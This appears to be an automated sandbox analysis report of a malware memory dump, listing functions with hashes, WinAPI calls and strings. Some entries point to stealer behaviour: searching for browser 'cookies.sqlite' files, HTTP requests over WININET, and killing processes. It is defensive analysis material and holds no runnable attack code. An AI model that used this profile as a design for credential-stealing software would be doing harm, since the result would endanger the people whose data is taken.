Instruction ID: daebedf84d2fb1b9d23db4f895bb1b02627bc43b0f9e6701ff9b3040012682c1
Opcode Fuzzy Hash: 18b16e369509344f178fa286afbfb576ac288287cbb7ca688a76b71b79e49eaa
Instruction Fuzzy Hash: 4651371150C3E14AD3298B2E48A1576FFE2AED2302B8CC69EE8E647793D16CE51CC771

Uniqueness

Uniqueness Score: -1.00%

Function 00421360, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ac94f7eac41c7ba299ea80b4b50479f0a51c57bbc69ec6c4242dca7a4822289
Instruction ID: 00c86eefa15eff5e828de4bd14e489049a3b39abf00b1a0d269254ea938a805c
Opcode Fuzzy Hash: 1ac94f7eac41c7ba299ea80b4b50479f0a51c57bbc69ec6c4242dca7a4822289
Instruction Fuzzy Hash: 984158B2E046324AF30CCF2AA529261EFD3ABD1301349C17BD5AA87655C7708016E7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00421200, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9cc5bbcb968529a2ca602279290d77f02fa66703c1c40be36d5c38abda6847b
Instruction ID: 62c56e9f8b0c068be1013474630b8a2e95005bcff528c1446879b3a6a7c71574
Opcode Fuzzy Hash: e9cc5bbcb968529a2ca602279290d77f02fa66703c1c40be36d5c38abda6847b
Instruction Fuzzy Hash: 5531B392B5A6909DD700D639C801785BB82C7E7128F9CC6BDE0588BFDBD22A940AC795

Uniqueness

Uniqueness Score: -1.00%

Function 0049D0F0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 321b955498b90130f58826a429d81102f9d33588e07cb83a6734ca6c8551ad8b
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 4B115077A0009153DE14CE3DD9B65B7EF95EBD7320B2C437BD0414B758D22AD985D608

Uniqueness

Uniqueness Score: -1.00%

Function 004982C0, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418356fbf7a41597f6cb58822acaa329cff84b2edbddee9a3604e00bcfe76132
Instruction ID: e7eb43701fe1d378e3c2e4dfa6114a63b42d6e99290750e85edf32d235511e88
Opcode Fuzzy Hash: 418356fbf7a41597f6cb58822acaa329cff84b2edbddee9a3604e00bcfe76132
Instruction Fuzzy Hash: B3219A335798F706D7948B328C04A762BD2CBCA246F6F81F9DE8487252C63ED403E615

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: e062db63554d41186879899b2a29d86d0d446b4106035f511935d59846ebc158
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: FEB092606124C04BEB2283248419B0276E1A740B06F8984E0A04582D92C66C8A84A104

Uniqueness

Uniqueness Score: -1.00%

Function 00415310, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 203networkCOMMON

Download Yara Rule

APIs

__cftof.LIBCMT ref: 004153E5
InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 00415403
InternetSetOptionA.WININET ref: 00415425
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 0041544F
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00400000,00000001), ref: 0041547D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041549A
InternetCloseHandle.WININET(00000000), ref: 004154B1

Part of subcall function 00414FD0: InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00415041
Part of subcall function 00414FD0: InternetReadFile.WININET(?,?,000003E8,?), ref: 00415062
Part of subcall function 00414FD0: _memmove.LIBCMT ref: 0041509D
Part of subcall function 00414FD0: _memset.LIBCMT ref: 004150D7
Part of subcall function 00414FD0: HttpQueryInfoA.WININET(?,0000001D,?,?,00000000), ref: 004150ED

InternetCloseHandle.WININET(00000000), ref: 004154B8
InternetCloseHandle.WININET(00000000), ref: 004154C4

Part of subcall function 00414E80: HttpAddRequestHeadersA.WININET(?,77EF155D,?,20000000), ref: 00414F00
Part of subcall function 00414E80: HttpAddRequestHeadersA.WININET(?,77EF155D,?,20000000), ref: 00414F30
Part of subcall function 00414E80: HttpAddRequestHeadersA.WININET(?,77EF155D,?,20000000), ref: 00414F60
Part of subcall function 00414E80: HttpAddRequestHeadersA.WININET(?,77EF155D,?,20000000), ref: 00414F90

Strings

/, xrefs: 004153A6
http://, xrefs: 00415377
GET, xrefs: 00415477

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$Http$Request$Headers$CloseHandle$FileOpen$ConnectInfoOptionPointerQueryReadSend__cftof_memmove_memset
String ID: /$GET$http://
API String ID: 3181371185-2325301807
Opcode ID: 9591bf102f1c311b7fa202cbda15159c952b12215bbb018c79a422fc8d5bdcef
Instruction ID: 8db07d805f68f9f5de63f8cd420c743e13d842eb26b56de422f3cb701a38c734
Opcode Fuzzy Hash: 9591bf102f1c311b7fa202cbda15159c952b12215bbb018c79a422fc8d5bdcef
Instruction Fuzzy Hash: 556193B1608740EFD710DB64DC85FABB7E9FBC9704F40092EF58596281DBB8E9448B1A

Uniqueness

Uniqueness Score: -1.00%

Function 0049C0DC, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(004D4A28,P-@,?,?,?,0049C1E0,?,004CEA38,0000000C,0049C20C,?,?,0049C9D5,004B7CF1,?), ref: 0049C0F1
DecodePointer.KERNEL32(?,?,0049C1E0,?,004CEA38,0000000C,0049C20C,?,?,0049C9D5,004B7CF1,?), ref: 0049C0FE
__realloc_crt.LIBCMT ref: 0049C13B
__realloc_crt.LIBCMT ref: 0049C151
EncodePointer.KERNEL32(00000000,?,?,0049C1E0,?,004CEA38,0000000C,0049C20C,?,?,0049C9D5,004B7CF1,?), ref: 0049C163
EncodePointer.KERNEL32(?,?,?,0049C1E0,?,004CEA38,0000000C,0049C20C,?,?,0049C9D5,004B7CF1,?), ref: 0049C177
EncodePointer.KERNEL32(-00000004,?,?,0049C1E0,?,004CEA38,0000000C,0049C20C,?,?,0049C9D5,004B7CF1,?), ref: 0049C17F

Strings

P-@, xrefs: 0049C0E3

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID: P-@
API String ID: 4108716018-3305893085
Opcode ID: 25e0e4e601459e24bcbd8275923078b7c521353a8ec7af66a76a19f52b6b5bdf
Instruction ID: 7012e1594ca56cf5a7f4639412be7d728f5325b0ba160baa60806d2465e23922
Opcode Fuzzy Hash: 25e0e4e601459e24bcbd8275923078b7c521353a8ec7af66a76a19f52b6b5bdf
Instruction Fuzzy Hash: 8F11D372600215AFDF005F78EDC285A7BEDEB45364311097BE801E3261EB75EC818E9C

Uniqueness

Uniqueness Score: -1.00%

Function 00496100, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00417A90: std::locale::_Init.LIBCPMT ref: 00417AD6
Part of subcall function 00417A90: std::_Lockit::_Lockit.LIBCPMT ref: 00417AE9

Part of subcall function 00418B00: std::_Lockit::_Lockit.LIBCPMT ref: 00418B59

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0049629C

Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 00417963
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 0041798C
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 004179AB
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 004179CD
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 004179EC
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 00417A09
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 00417A28

Strings

@A@, xrefs: 004961DE
0pL, xrefs: 004961D7
@B@, xrefs: 00496218
A@, xrefs: 004961ED
`J@, xrefs: 0049620B

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exception$LockitLockit::_std::_$InitIos_base_dtorstd::ios_base::_std::locale::_
String ID: 0pL$@A@$@B@$`J@$A@
API String ID: 250614744-438863827
Opcode ID: 97e982bee7af23ef6303ac1ab39a5d5ab0d7019686e83b7fe38ec1941dbf8ba8
Instruction ID: 65ae86c68d49ab7a11304c8b24cbdb17181524f5cbbb5bd10e2968bbc8fed94e
Opcode Fuzzy Hash: 97e982bee7af23ef6303ac1ab39a5d5ab0d7019686e83b7fe38ec1941dbf8ba8
Instruction Fuzzy Hash: B64137B0508380CFD724DF24C580B9BFBE4FB98308F508D2EE59997251DBB89548CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004180A0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004180CE
std::exception::exception.LIBCMT ref: 0041810D

Part of subcall function 0049C32E: std::exception::_Copy_str.LIBCMT ref: 0049C349

__CxxThrowException@8.LIBCMT ref: 00418124

Part of subcall function 0049C9F1: RaiseException.KERNEL32(S0@,?,77EF155D,004BB6BC,00403053,?,004CB4C0,?,77EF155D), ref: 0049CA33

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0041812B

Strings

bad locale name, xrefs: 00418105
yA, xrefs: 0041811C

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: yA$bad locale name
API String ID: 73090415-1344023470
Opcode ID: 8c137d7277b8d131593d02a7f6fec72f1394c890439066219a858aad24473143
Instruction ID: b99b666c4dad2dc89f48d61ff09c0cb729f592b38e8194f2ab0e255fa7e4e700
Opcode Fuzzy Hash: 8c137d7277b8d131593d02a7f6fec72f1394c890439066219a858aad24473143
Instruction Fuzzy Hash: C01182B24087409FC310DF199981A47FBE4FB68714F408A6FF49993741D738A508CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 00403370, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040338A

Part of subcall function 0049B1D5: std::exception::exception.LIBCMT ref: 0049B1EA
Part of subcall function 0049B1D5: __CxxThrowException@8.LIBCMT ref: 0049B1FF
Part of subcall function 0049B1D5: std::exception::exception.LIBCMT ref: 0049B210

std::_Xinvalid_argument.LIBCPMT ref: 004033C6

Part of subcall function 0049B188: std::exception::exception.LIBCMT ref: 0049B19D
Part of subcall function 0049B188: __CxxThrowException@8.LIBCMT ref: 0049B1B2
Part of subcall function 0049B188: std::exception::exception.LIBCMT ref: 0049B1C3

_memmove.LIBCMT ref: 00403427

Strings

string too long, xrefs: 004033C1
invalid string position, xrefs: 00403385

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: fc93dd350163ac896bd10fc0d01a27d28a2137a1cc3c99cb49942f13efd03dce
Instruction ID: fc52d5bcf03503e14a0d47f07702954af73c8eadaf93a15c0afd54800ed5a30f
Opcode Fuzzy Hash: fc93dd350163ac896bd10fc0d01a27d28a2137a1cc3c99cb49942f13efd03dce
Instruction Fuzzy Hash: 0121F7323006109BC7219E5DA980A6EFB9CDBE2766F20093FF551DB2C1DB799D4083A9

Uniqueness

Uniqueness Score: -1.00%

Function 004171E6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 00417256
FindNextFileA.KERNEL32(00000000,?), ref: 00417358
FindClose.KERNEL32(00000000), ref: 00417367

Strings

%s\%s, xrefs: 00417250
cookies.sqlite, xrefs: 0041725F

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$CloseFileNext_sprintf
String ID: %s\%s$cookies.sqlite
API String ID: 1046737199-1020834890
Opcode ID: 2eb414782a19d272b390491ef47deb18e78dbd948902ac9104ddf3cc706b2ab7
Instruction ID: 064d92779e4786fb1707a0bbc9186d9a03ebf30d1dd5110ac8f349b91cf63455
Opcode Fuzzy Hash: 2eb414782a19d272b390491ef47deb18e78dbd948902ac9104ddf3cc706b2ab7
Instruction Fuzzy Hash: 7721367210C2801AC7219F309CC1AF77B7E9BA6304F48499FF89686241EB3FD54DC26A

Uniqueness

Uniqueness Score: -1.00%

Function 00493050, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00493057

Part of subcall function 0049E04E: __FF_MSGBANNER.LIBCMT ref: 0049E067
Part of subcall function 0049E04E: __NMSG_WRITE.LIBCMT ref: 0049E06E
Part of subcall function 0049E04E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A0B2E,00000000,00000001,00000000,?,004A75C4,00000018,004CF090,0000000C,004A7654), ref: 0049E093

GetTickCount.KERNEL32 ref: 00493064

Part of subcall function 0049FE88: __getptd.LIBCMT ref: 0049FE8D

_rand.LIBCMT ref: 00493080

Part of subcall function 0049FE9A: __getptd.LIBCMT ref: 0049FE9A

_sprintf.LIBCMT ref: 00493095

Strings

%s%d, xrefs: 0049308F

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_rand_sprintf
String ID: %s%d
API String ID: 2210831635-1110647743
Opcode ID: 9ebabe74a073720600e8862edd3ea84d53632f7f2ce9d6442dfb6cdb9d76b5c6
Instruction ID: 94034e78967ba481b7292eef43dac6ac7b7959af3d56be502e03ba38a1ad7de7
Opcode Fuzzy Hash: 9ebabe74a073720600e8862edd3ea84d53632f7f2ce9d6442dfb6cdb9d76b5c6
Instruction Fuzzy Hash: 51F0BB9370015157DB117AAA9C45F87AE8C8F61351F14447FF648C7213E969CD5083BB

Uniqueness

Uniqueness Score: -1.00%

Function 0049E1B5, Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0049E210
_memcpy_s.LIBCMT ref: 0049E281
__read.LIBCMT ref: 0049E2E4
__filbuf.LIBCMT ref: 0049E300

Part of subcall function 004A284D: __getptd_noexit.LIBCMT ref: 004A284D

_memset.LIBCMT ref: 0049E341

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 583b1b677e1792be25ddf204d47e98c5b0f8de77f7936e8b47d8b9f05f1225b4
Instruction ID: 1ac67f202c977f64f0fa06004735b99fc761685b36bf4d2ab039f42c530740d4
Opcode Fuzzy Hash: 583b1b677e1792be25ddf204d47e98c5b0f8de77f7936e8b47d8b9f05f1225b4
Instruction Fuzzy Hash: 4E51D030A00205EBDF24DFABC94469FBFB5AF51320F24827BE82497291D7789E41CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00418150, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00418182

Part of subcall function 0049B6AA: _setlocale.LIBCMT ref: 0049B6BC

_free.LIBCMT ref: 00418194

Part of subcall function 0049E874: RtlFreeHeap.NTDLL(00000000,00000000,?,004030AB,?,77EF155D), ref: 0049E88A

_free.LIBCMT ref: 004181A7
_free.LIBCMT ref: 004181BA
_free.LIBCMT ref: 004181CD

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$FreeHeapLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 1034197179-0
Opcode ID: b5b02bde389356c97008c127cfe2bc10859bcc976c1755d0fcbfc13f9b871136
Instruction ID: 9940f372f53cae88a363a79202e9387dc8d63462f9e991f136512c6998a2b412
Opcode Fuzzy Hash: b5b02bde389356c97008c127cfe2bc10859bcc976c1755d0fcbfc13f9b871136
Instruction Fuzzy Hash: 761182F1900B406BDA20DF1AD845A4BFBE9EF90710F144A2FF05AC3750E739E8048A96

Uniqueness

Uniqueness Score: -1.00%

Function 004A7136, Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004A7142

Part of subcall function 004A4EDD: __getptd_noexit.LIBCMT ref: 004A4EE0
Part of subcall function 004A4EDD: __amsg_exit.LIBCMT ref: 004A4EED

__getptd.LIBCMT ref: 004A7159
__amsg_exit.LIBCMT ref: 004A7167
__lock.LIBCMT ref: 004A7177
__updatetlocinfoEx_nolock.LIBCMT ref: 004A718B

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 4d4828333fb6b383eab88b09f1e7db4750f43e6ab659692cd90c228e13da406b
Instruction ID: 72ba6c850253534e5d4345560bca46b6812f78be0ef27554b4da5c5398e7648a
Opcode Fuzzy Hash: 4d4828333fb6b383eab88b09f1e7db4750f43e6ab659692cd90c228e13da406b
Instruction Fuzzy Hash: 8AF062319486109AD631BB699C02B4F33D06F2272DF10425FE054963C2CB6C59419A5E

Uniqueness

Uniqueness Score: -1.00%

Function 0042F040, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042F107
_memset.LIBCMT ref: 0042F258

Strings

0, xrefs: 0042F1A2
|EM, xrefs: 0042F0BF, 0042F0E0, 0042F1E6, 0042F207

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID: 0$|EM
API String ID: 2102423945-2430296235
Opcode ID: 4779ea2c7a74a9354124b13f0a480c8e567964b7ee21737ba3978441bbfeabfe
Instruction ID: 2e47e9e8c0fd1c54b829745a75baa20473620332735116e542dd244afe2fc290
Opcode Fuzzy Hash: 4779ea2c7a74a9354124b13f0a480c8e567964b7ee21737ba3978441bbfeabfe
Instruction Fuzzy Hash: 4161BC70B00216DBD704DF28E884A2B77A5BF84744FD4893EE8458B356E738DD19CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403110, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 004031B0

Part of subcall function 0049C32E: std::exception::_Copy_str.LIBCMT ref: 0049C349

__CxxThrowException@8.LIBCMT ref: 004031C5

Part of subcall function 0049C9F1: RaiseException.KERNEL32(S0@,?,77EF155D,004BB6BC,00403053,?,004CB4C0,?,77EF155D), ref: 0049CA33

Part of subcall function 00402F40: std::exception::exception.LIBCMT ref: 00402F76
Part of subcall function 00402F40: __CxxThrowException@8.LIBCMT ref: 00402F8D

_memmove.LIBCMT ref: 0040320E

Strings

P-@, xrefs: 004031BE

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
String ID: P-@
API String ID: 163498487-3305893085
Opcode ID: 6a84d269265d8b073d9c57cdacd598ee0899828f696f813e75356703f868d457
Instruction ID: 486326a0063b83de9025a31b2d93e7eb048a48092115a542314a79203f052a6c
Opcode Fuzzy Hash: 6a84d269265d8b073d9c57cdacd598ee0899828f696f813e75356703f868d457
Instruction Fuzzy Hash: 9841B771A00105ABCB04DF69C9816AEBBF9FB49355F20423FE816A7780D778AE44C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00491030, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,?,004123DF,?,006CC960,00000000,?,006CC910,00000000), ref: 00491042
IsWow64Process.KERNEL32(00000000,?,?,004123DF,?,006CC960,00000000,?,006CC910,00000000), ref: 00491049

Strings

x64, xrefs: 0049105B
x86, xrefs: 00491064

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CurrentWow64
String ID: x64$x86
API String ID: 1905925150-1778291495
Opcode ID: b3bdd6316ac2445cbe0fd218eea76ef28b5b210bae562b58a04c998909d29fe5
Instruction ID: 6d39bd485af480b2140526ce6b5fe6e71a0dd36a15449e4175001148558a5463
Opcode Fuzzy Hash: b3bdd6316ac2445cbe0fd218eea76ef28b5b210bae562b58a04c998909d29fe5
Instruction Fuzzy Hash: B8F05EB1605302AFD7208F68D885B17BBECAB44791F14893FB186966A0C67889448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0049F2BD, Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0049F358
__flush.LIBCMT ref: 0049F376
__write.LIBCMT ref: 0049F39D
__flsbuf.LIBCMT ref: 0049F3C8

Part of subcall function 004A284D: __getptd_noexit.LIBCMT ref: 004A284D

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: c508005460ceb58cc648dba9677085501ab7387885df71f5878eefc423c3b2e6
Instruction ID: 4c8b7da3941b3fbc133e5dc0a3ea6702fd7cd52a7b71e60dbc717fcc10f89492
Opcode Fuzzy Hash: c508005460ceb58cc648dba9677085501ab7387885df71f5878eefc423c3b2e6
Instruction Fuzzy Hash: E9419F31A006049BDF24DFAA88856AFBFB5AF80324F24817FEC55D6280D77DDD498B48

Uniqueness

Uniqueness Score: -1.00%

Function 004B121A, Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004B124E
__isleadbyte_l.LIBCMT ref: 004B1281
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036ACC,00BFBBEF,00000000,?,?,?,004AF6A4,00000109,00BFBBEF,00000003), ref: 004B12B2
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,004AF6A4,00000109,00BFBBEF,00000003), ref: 004B1320

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9c17a0650e31d761841d794ae28cb099ae0994050b4eb252ae31cce1953730a1
Instruction ID: 4db2654cd19cbf0ff6fdb0cc35245cd9993303e1929d1d4c5589467273d214f0
Opcode Fuzzy Hash: 9c17a0650e31d761841d794ae28cb099ae0994050b4eb252ae31cce1953730a1
Instruction Fuzzy Hash: CE31D531500285EFDF14DFA8C8A49EE3BA5BF01310F5485EAE555EB2A1D734DD40DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00493120, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?,?,00000000,00000000,00000000), ref: 00493139
_malloc.LIBCMT ref: 00493151

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EncodersGdipImageSize_malloc
String ID:
API String ID: 562675128-0
Opcode ID: 4c4f9c49db9d171f6ea75eeb0535d6af9122cd6854c2a634400d949959db66f3
Instruction ID: 7d92bf085faf7782d27ed5250d8dd4ee52a53542456e92d3558db234766de45d
Opcode Fuzzy Hash: 4c4f9c49db9d171f6ea75eeb0535d6af9122cd6854c2a634400d949959db66f3
Instruction Fuzzy Hash: 512129726042105FCB10EF19EC8149BB7E5EF95334F54877BE8688B361E336DA46C691

Uniqueness

Uniqueness Score: -1.00%

Function 004B1107, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,004A89DD,00000000,00000000,75145970,?,0049EA8B,?,00000000), ref: 004B110A
__malloc_crt.LIBCMT ref: 004B1139
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,00000000,?,0049EA8B,?,00000000), ref: 004B1146

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 6a545c4eea53c8abc3d283bf423365c5b47139f1082aa3a0396a3a152f16749f
Instruction ID: 316f26375f605f0cd77650341741c6df0c53f4fdb34655e037849bd45c2b6d01
Opcode Fuzzy Hash: 6a545c4eea53c8abc3d283bf423365c5b47139f1082aa3a0396a3a152f16749f
Instruction Fuzzy Hash: 71F0A777601110ABCF31777DBC958DB6739DAEA36435A452BF901C3360FA288D8286F9

Uniqueness

Uniqueness Score: -1.00%

Function 00417110, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00417000: _malloc.LIBCMT ref: 0041702D
Part of subcall function 00417000: CreateToolhelp32Snapshot.KERNEL32 ref: 00417043
Part of subcall function 00417000: CloseHandle.KERNEL32(00000000), ref: 00417053

OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000010,?,006CCD90,00000000,0000000F,00000000,0041F648,006CCD90,0000000F,751461B0,00000010), ref: 0041713E
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041714A
CloseHandle.KERNEL32(00000000), ref: 00417151
_free.LIBCMT ref: 00417161

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandleProcess$CreateOpenSnapshotTerminateToolhelp32_free_malloc
String ID:
API String ID: 486718275-0
Opcode ID: 88e350bd4915f0adc2850e7e4ae473a47af4a785e8cb2460a7e95dc70eab1179
Instruction ID: a9f691b70349764571496d57c412afc6bc238ee9e7d35e4ab4f066066c225ec7
Opcode Fuzzy Hash: 88e350bd4915f0adc2850e7e4ae473a47af4a785e8cb2460a7e95dc70eab1179
Instruction Fuzzy Hash: 8CF0B4732042147BD200A6AA9C85F9FB3BC9B85764F01463AF76592280DA74AC8586AE

Uniqueness

Uniqueness Score: -1.00%

Function 004032C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004032D2

Part of subcall function 0049B188: std::exception::exception.LIBCMT ref: 0049B19D
Part of subcall function 0049B188: __CxxThrowException@8.LIBCMT ref: 0049B1B2
Part of subcall function 0049B188: std::exception::exception.LIBCMT ref: 0049B1C3

_memmove.LIBCMT ref: 0040331A

Strings

string too long, xrefs: 004032CD

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: 6a40a289142524da8d4680e903f1052adf6084cb1f608ab499ebebaaca6783ca
Instruction ID: 5da86d647c49e79fdf99b9f508c935f0504fb0c180d761ed05676a4a24ba0056
Opcode Fuzzy Hash: 6a40a289142524da8d4680e903f1052adf6084cb1f608ab499ebebaaca6783ca
Instruction Fuzzy Hash: FE115B711447085BEB20AE6C6981A3FBB9CAB61710F500E3FE497D26C1DF79E9448298

